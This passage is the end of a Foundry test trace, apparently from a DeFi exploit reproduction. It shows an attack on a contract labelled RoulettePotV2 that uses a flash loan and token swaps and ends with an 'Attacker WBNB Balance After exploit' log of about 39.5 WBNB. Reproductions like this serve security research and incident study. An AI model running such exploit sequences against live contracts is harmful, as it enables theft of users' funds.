    │   │   │   │   │   @ 0x929729c8ede6948f663122c2a6323a9d736d8f553add6927f8c8bc52708f1282: 0x00000000000000000000000000000000000000000000000127292efc67315aeb → 0
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ emit SuppliedLink(: 21268582376831802091 [2.126e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x679795a0195a1b76cdebb7c51d74e058aee92919b8c3389af86ef24535e8a28e: 0x000000000000000000000000000000000000000000000000830b5b1f8c704f16 → 0
    │   │   │   │   @ 0x08037d7b151cc412d25674a4e66b334d9ae9d2e5517a7feaae5cdb828bf1c628: 0x000000000000000000000000000000000000000000000000009fdf42f6e48000 → 0x0000000000000000000000000000000000000000000000000087e1d8eee4884e
    │   │   │   │   @ 0xee60d0579bcffd98e668647d59fec1ff86a7fb340ce572e844f234ae73a69191: 0x0000000000000000000000000000000000000000000044ca2a44385ccfd552f6 → 0
    │   │   │   │   @ 0x88601476d11616a71c5be67555bd1dff4b1cbf21533d2669b768b61518cfe1cd: 0x0000000000000000000000000000000000000000000000000000000065cc8c3d → 0x000000000000000000000000000000000000000000000000000000006782338a
    │   │   │   │   @ 0xee60d0579bcffd98e668647d59fec1ff86a7fb340ce572e844f234ae73a69198: 0x0000000000000000000000000000000000000000000003f1683e5065e4e0c000 → 0
    │   │   │   │   @ 0x59dd4b18488d12f51eda69757a0ed42a2010c14b564330cc74a06895e60c077d: 0x00000000000000000000000000000000000000004a6706d2befeeb2e4c1b5b20 → 0
    │   │   │   │   @ 0xfb9ce45064c7e7d9bf9deb4750ba7c94ab3d6e7418c5d76bf69966d39a9d42f6: 0x000000000000000000000000000000000000000000000000009fdf42f6e48000 → 0x0000000000000000000000000000000000000000000000000077757e8696af1f
    │   │   │   │   @ 0xe90b7bceb6e7df5418fb78d8ee546e97c83a08bbccc01a0644d599ccd2a7c2e2: 0x00000000000000000000000000000000000000000000000039e4834175d982bb → 0
    │   │   │   │   @ 0x251164fe1d8864fe5e86082eae9c288bc2b58695a4d28538dfe86e9e4f175585: 0x0000000000000000000000000000000000000000000000017dfc71aa92a08000 → 0x0000000000000000000000000000000000000000000000007acbcca43b1e3cff
    │   │   │   │   @ 0x17bc176d2408558f6e4111feebc3cab4e16b63e967be91cde721f4c8a488b552: 0x00000000000000000000000000000000000000000000000073bda1d012c20000 → 0x00000000000000000000000000000000000000000000000056ee8c0f3a31d5f0
    │   │   │   │   @ 0x88601476d11616a71c5be67555bd1dff4b1cbf21533d2669b768b61518cfe1c5: 0x00000000000000000000000000000000000000000000001fc411c970348946eb → 0x00000000000000000000000000000000000000000000000e1bc723c777acf5f2
    │   │   │   │   @ 0x9bfbaa59f8e10e7868f8b402de9d605a390c45ddaebd8c9de3c6f31e733c87ff: 0x000000000000000000000000000000000000000000000000077e772392b60000 → 0
    │   │   │   │   @ 0xee60d0579bcffd98e668647d59fec1ff86a7fb340ce572e844f234ae73a69199: 0x0000000000000000000000000000000000000000000000000000000065cc8c3d → 0x000000000000000000000000000000000000000000000000000000006782338a
    │   │   │   │   @ 0xe90b7bceb6e7df5418fb78d8ee546e97c83a08bbccc01a0644d599ccd2a7c2e9: 0x0000000000000000000000000000000000000000000000001581fee388e68000 → 0
    │   │   │   │   @ 0x88601476d11616a71c5be67555bd1dff4b1cbf21533d2669b768b61518cfe1cc: 0x0000000000000000000000000000000000000000000000013a8dcee90f010000 → 0
    │   │   │   │   @ 0xe90b7bceb6e7df5418fb78d8ee546e97c83a08bbccc01a0644d599ccd2a7c2ea: 0x0000000000000000000000000000000000000000000000000000000065d07dfb → 0x000000000000000000000000000000000000000000000000000000006782338a
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 17527795283271427200665 [1.752e22]
    │   │   ├─ [3271] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::transfer(0x824eb9faDFb377394430d2744fa7C42916DE3eCe, 17527795283271427200665 [1.752e22])
    │   │   │   ├─ emit Transfer(from: RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, value: 17527795283271427200665 [1.752e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x8a489ea344a3a07b0cdfa9d1a5f7e562e8e7801e934af5b7a32cbede3ef02c99: 0x0000000000000000000000000000000000000000000000801142e6a302829609 → 0x0000000000000000000000000000000000000000000004364048f6885b392ca2
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000003b62f060fe558b69699 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [38255] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::swap(4243674096928729821513 [4.243e21], 0, RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4243674096928729821513 [4.243e21])
    │   │   │   │   ├─ emit Transfer(from: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, to: RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 4243674096928729821513 [4.243e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x66ec1991f6397975a4f4a1234495c6e178d730f45f32c044c0a3953f810d8b92: 0x0000000000000000000000000000000000000000000001052260f9ffbfd7441a → 0x00000000000000000000000000000000000000000000001f1591f6ca944bd2d1
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000e60ccf03352b8b7149
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   └─ ← [Return] 573403360981347455697 [5.734e20]
    │   │   │   ├─ [531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   └─ ← [Return] 19890222334741153655970 [1.989e22]
    │   │   │   ├─ emit Sync(reserve0: 573403360981347455697 [5.734e20], reserve1: 19890222334741153655970 [1.989e22])
    │   │   │   ├─ emit Swap(sender: RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 17527795283271427200665 [1.752e22], amount0Out: 4243674096928729821513 [4.243e21], amount1Out: 0, to: RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x6782338a0000000000801142e6a3028296090000000001052260f9ffbfd7441a → 0x6782338a0000000004364048f6885b392ca200000000001f1591f6ca944bd2d1
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x172fcD41E0913e95784454622d1c3724f546f849, 4204152503413020000000 [4.204e21])
    │   │   │   ├─ emit Transfer(from: RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x172fcD41E0913e95784454622d1c3724f546f849, value: 4204152503413020000000 [4.204e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000e60ccf03352b8b7149 → 0x0000000000000000000000000000000000000000000000022478e7e87d43f249
    │   │   │   │   @ 0xed93f154226bea5228a538ddd7f6e1b8d878a5d95dc495daa8ac4679fe6b0986: 0x00000000000000000000000000000000000000000000002064bc633fb6483501 → 0x0000000000000000000000000000000000000000000001044d127e8c648fb401
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x172fcD41E0913e95784454622d1c3724f546f849) [staticcall]
    │   │   └─ ← [Return] 3024076575304015256139990 [3.024e24]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x172fcD41E0913e95784454622d1c3724f546f849) [staticcall]
    │   │   └─ ← [Return] 4801707099596432323585 [4.801e21]
    │   ├─ emit Flash(param0: RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, param2: 0, param3: 4203732130200000000000 [4.203e21], param4: 0, param5: 420373213020000000 [4.203e17])
    │   ├─  storage changes:
    │   │   @ 4: 0x00000000000000008a3c311ab624549c000000000000016fc329c3a60d62e972 → 0x00000000000000008c29091569bd865c000000000000016fc329c3a60d62e972
    │   │   @ 3: 0x00000000000000000000000000000000011624b5048483cae084f419a208f38d → 0x000000000000000000000000000000000116263fe99f7d8f3f2b06e6db289c32
    │   └─ ← [Stop]
    ├─ [1264] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::symbol() [staticcall]
    │   └─ ← [Return] "WBNB"
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(RoulettePotV2: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 39521593515709821513 [3.952e19]
    ├─ [444] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker WBNB Balance After exploit", val: 39521593515709821513 [3.952e19], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x000000000000000000000000000000000000000000000000000000000ce40ce4 → 0x000000000000000000000000000000000000000000000000000000010ce40ce4
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 55.62s (54.00s CPU time)

Ran 2 test suites in 56.81s (56.48s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
